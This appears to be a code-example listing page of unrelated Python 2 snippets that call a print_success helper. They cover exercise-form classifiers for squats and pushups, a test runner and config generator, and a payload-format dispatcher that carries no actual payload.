                                                               multiples=[0.5],
                                                               predict=True)
            X1, Y, file_names = self.extract_advanced_features(
                reps=reps, multiples=[0.2, 0.4, 0.6, 0.8], predict=True)
            X3, Y, file_names = self.extract_advanced_features(
                reps=reps,
                multiples=[
                    0.05, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55,
                    0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95
                ],
                predict=True)

            #=====[ Sets up dictionary of feature vectors  ]=====
            X = {}
            X['bend_hips_knees'] = preprocessing.StandardScaler(
            ).fit_transform(X3['bend_hips_knees'])
            X['stance_width'] = preprocessing.StandardScaler().fit_transform(
                X1['stance_width'])
            X['squat_depth'] = preprocessing.StandardScaler().fit_transform(
                X0['squat_depth'])
            X['knees_over_toes'] = preprocessing.StandardScaler(
            ).fit_transform(np.concatenate([X3[x] for x in X3], axis=1))
            X['back_hip_angle'] = preprocessing.StandardScaler().fit_transform(
                np.concatenate([X0[x] for x in X0], axis=1))

        elif exercise is 'pushup':
            #=====[ Retreives relevant training data for each classifier  ]=====
            X3, Y, file_names = self.extract_pu_features(
                reps=reps,
                multiples=[
                    0.05, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55,
                    0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95
                ],
                predict=True)
            X4, Y, file_names = self.extract_pu_features(
                reps=reps,
                multiples=[float(x) / 100 for x in range(100)],
                predict=True)

            X30 = np.concatenate([X3[x] for x in X3], axis=1)
            X40 = np.concatenate([X4[x] for x in X4], axis=1)

            #=====[ Sets up dictionary of feature vectors  ]=====
            X = {}
            X['head_back'] = preprocessing.StandardScaler().fit_transform(X40)
            X['knees_straight'] = preprocessing.StandardScaler().fit_transform(
                X30)
            X['elbow_angle'] = preprocessing.StandardScaler().fit_transform(
                X3['elbow_angle'])

        ut.print_success('Features extracted for ' + exercise)

        return X
Ejemplo n.º 33
0
def preprocess_features(folder):
    utils.print_success("Preprocessing train set")
    folder = utils.abs_path_dir(folder)
    filelist = os.listdir(folder)
    nb_file = str(len(filelist))
    for index, filename in enumerate(filelist):
        utils.print_progress_start(str(index) + "/" + nb_file + " " + filename)
        convert_feats_files(folder + filename)
    utils.print_progress_end()
Ejemplo n.º 34
0
	def classify(self, exercise, key, X, verbose=False):
		
		try:
			prediction = self.classifiers[exercise][key].predict(X)
			if verbose:
				ut.print_success(key + ': reps classified')
			return prediction
			
		except Exception as e:
			print e
			ut.print_failure(key + ': reps not classified')
			return None
Ejemplo n.º 35
0
    def run(self):
        print_status("Generating payload")
        try:
            data = self.generate()
        except OptionValidationError as e:
            print_error(e)
            return

        if self.output == "elf":
            with open(self.filepath, 'w+') as f:
                print_status("Building ELF payload")
                content = self.generate_elf(data)
                print_success("Saving file {}".format(self.filepath))
                f.write(content)
        elif self.output == "c":
            print_success("Bulding payload for C")
            content = self.generate_c(data)
            print_info(content)
        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python(data)
            print_info(content)
        else:
            raise OptionValidationError(
                "No such option as {}".format(self.output)
            )
Ejemplo n.º 36
0
	def get_prediction_features_opt(self, exercise, reps, verbose=False):
			
		if exercise is 'squat':

			#=====[ Load feature indicies  ]=====
			feature_indices = pickle.load(open(os.path.join('../inference/','squat_feature_indices.p'),'rb'))

			#=====[ Retreives relevant training data for each classifier  ]=====
			X3, Y, file_names = self.extract_advanced_features(reps=reps, multiples=[float(x)/20 for x in range(1,20)],predict=True)
			X30 = np.concatenate([X3[x] for x in X3],axis=1)

			#=====[ Sets up dictionary of feature vectors  ]=====
			X= {}
			X['bend_hips_knees'] = X30[:,feature_indices['bend_hips_knees']]
			X['stance_width'] = X30[:,feature_indices['stance_width']]
			X['squat_depth'] = X30[:,feature_indices['squat_depth']]
			X['knees_over_toes'] = X30[:,feature_indices['knees_over_toes']]
			X['back_hip_angle'] = X30[:,feature_indices['back_hip_angle']]

		elif exercise is 'pushup':

			#=====[ Load feature indicies  ]=====
			feature_indices = pickle.load(open(os.path.join('../inference/','pushup_feature_indices.p'),'rb'))

			#=====[ Retreives relevant training data for each classifier  ]=====
			X3, Y, file_names  = self.extract_pu_features(reps=reps, multiples=[0.05, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95], predict=True)
			X30 = np.concatenate([X3[x] for x in X3],axis=1)

			#=====[ Sets up dictionary of feature vectors  ]=====
			X = {}
			X['head_back'] = X30[:,feature_indices['head_back']]
			X['knees_straight'] = X30[:,feature_indices['knees_straight']]
			X['elbow_angle'] = X30[:,feature_indices['elbow_angle']]


		if verbose:
			ut.print_success('Features extracted for ' + exercise)

		return X
Ejemplo n.º 37
0
def run():
    """控制脚本的执行
    Args:
    Returns:
    Raises:
        KeyError: 如果配置文件没有设置会抛异常
    """
    use_env = options.use_env
    if use_env:
        fp = open("ruce.conf.yml.tmp", "w")
        with open("ruce.conf.yml") as conf_file:
            config = yaml.load(conf_file)
            if use_env in config["env"]:
                config["env"]["use_env"] = use_env
            yaml.dump(config, stream=fp, default_flow_style=False)
            fp.close()
            ret = shell("mv ruce.conf.yml.tmp ruce.conf.yml", capture=False)
            return
    current_dir = os.path.dirname(os.path.abspath(__file__)) + "/tpls"
    j2_env = Environment(loader=FileSystemLoader(current_dir), trim_blocks=True)
    case_name = options.gen_tpl
    if case_name:
        try:
            if os.path.exists("test_{}.py".format(case_name)):
                print "File test_{}.py has already existed".format(case_name)
                return
            new_case = j2_env.get_template("test_basic.tpl").render(name=case_name)
            create_file = open("test_{}.py".format(case_name), "w")
            create_file.write(new_case)
            create_file.close()
            print "create test_{}.py ok".format(case_name)
        except Exception as e:
            print ("gen_tpl params error\n" "--gen_tpl=case_name")
        return
    if options.gen_conf:
        try:
            env_name, host_port = options.gen_conf.split("=")
            host, port = host_port.split(":")
            new_conf = j2_env.get_template("basic_conf.tpl").render(env_name=env_name, host=host, port=port)
            create_file = open("ruce.conf.yml", "w")
            create_file.write(new_conf)
            create_file.close()
            print "create ruce.conf.yml ok"
        except Exception as e:
            print ("gen_conf params error\n" "--gen_conf='env_name=host:port'")
        return
    if options.name != "all":
        name_list = options.name.split(",")
        for name in name_list:
            file_name = "test_{}.py".format(name.strip())
            if os.path.exists(file_name):
                ret = shell(r"python {}".format(file_name), capture=True, debug=False)
                print ret.stdout
                print ret.stderr
    else:
        result_record = defaultdict(dict)
        name_list = os.listdir(".")
        print separator
        for name in name_list:
            if name.startswith("test_") and name.endswith(".py"):
                ret = shell(r"python {}".format(name), capture=True, debug=False)
                output = ret.stdout + ret.stderr
                parsed_result = parse_case(output)
                if parsed_result["passed"]:
                    print_success("{} ---- passed".format(name))
                else:
                    print_error("{} ---- failed".format(name))
                print "\r"
                result_record[name] = parsed_result
        parse_record(result_record)
    return
Ejemplo n.º 38
0
	def set_classifiers(self, exercise, classifiers):
		self.classifiers[exercise] = classifiers
		ut.print_success("Classifiers stored for " + exercise)
Ejemplo n.º 39
0
 def success(self, msg):
     print_success(msg)